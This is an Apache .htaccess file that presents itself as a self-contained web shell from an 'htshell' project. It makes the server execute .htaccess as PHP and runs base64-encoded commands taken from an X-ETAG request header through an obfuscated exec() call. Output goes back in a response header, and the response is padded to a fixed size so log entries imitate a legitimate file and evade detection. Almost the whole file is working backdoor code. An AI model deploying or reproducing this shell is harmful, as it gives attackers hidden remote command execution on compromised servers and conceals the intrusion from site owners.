# ALIF FUSOBAR - master@itsecurity.id - www.itsecurity.id
# Self contained .htaccess web shell - Part of the htshell project.

<Files ~ "^\.htaccess">
    Order allow,deny
    Allow from all
</Files>

AddType application/x-httpd-php .htaccess
php_value output_buffering 1
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]
RewriteCond %{HTTP:X-ETAG} ^$
RewriteRule .htaccess - [F]
Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header

# Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)

# SHELL
<?php ob_clean(); $b= "base64"."_decode"; $e = str_replace('y','e','yxyc'); $e($b(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat(" ", 9326); ob_flush(); exit(); ?>
# LLEHS